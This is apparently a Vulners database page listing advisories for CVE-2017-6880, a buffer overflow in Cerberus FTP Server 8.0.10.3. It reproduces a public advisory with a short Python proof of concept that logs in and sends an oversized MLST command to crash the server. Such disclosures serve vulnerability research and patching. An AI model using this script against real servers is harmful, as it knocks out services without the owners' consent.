| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| Cerberus FTP Server 8.0.10.3 - MLST Buffer Overflow Vulnerability | 17 Mar 201700:00 | – | zdt | |
| Cerberus FTP Server Remote Buffer Overflow Vulnerability (CNVD-2017-08299) | 12 May 201700:00 | – | cnvd | |
| CVE-2017-6880 | 17 Mar 201717:00 | – | cve | |
| CVE-2017-6880 | 17 Mar 201717:00 | – | cvelist | |
| EUVD-2017-15934 | 7 Oct 202500:30 | – | euvd | |
| Cerberus FTP Server 8.0.10.3 - MLST Buffer Overflow (PoC) | 16 Mar 201700:00 | – | exploitpack | |
| CVE-2017-6880 | 17 Mar 201717:59 | – | nvd | |
| CVE-2017-6880 | 17 Mar 201717:59 | – | osv | |
| Cerberus FTP 8.0.10.3 MLST Buffer Overflow | 15 May 201700:00 | – | packetstorm | |
| Buffer overflow | 17 Mar 201717:59 | – | prion |
[+] Title: Cerberus FTP Server 8.0.10.3 – 'MLST' Remote Buffer Overflow
[+] Credits / Discovery: Nassim Asrir
[+] Author Contact: [email protected] || https://www.linkedin.com/in/nassim-asrir-b73a57122/
[+] Author Company: Henceforth
[+] CVE: CVE-2017-6880
Vendor:
===============
https://www.cerberusftp.com/
Download:
===========
https://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit)
Vulnerability Type:
===================
Remote Buffer Overflow.
issue:
===================
This problem happens when the Attacker send the bad char "A" in the command "MLST" (2047).
POC:
===================
#Simple POC by Nassim Asrir from Henceforth.
import socket
bad_char = "A"*2047
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.1.81',21))
s.recv(1024)
s.send('USER nassim\r\n')
s.recv(1024)
s.send('PASS mypass\r\n')
s.recv(1024)
s.send('MLST ' + bad_char + '\r\n')
s.close()
https://gist.github.com/Nassim-Asrir/a1bb8479976d4bf6b7c0e63024a46cd6/archive/e76274496bf20a0d3ecbb4b2f6a408166808d03b.zip
Tested on:
===============
Windows 7 Sp1 (64 Bit)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation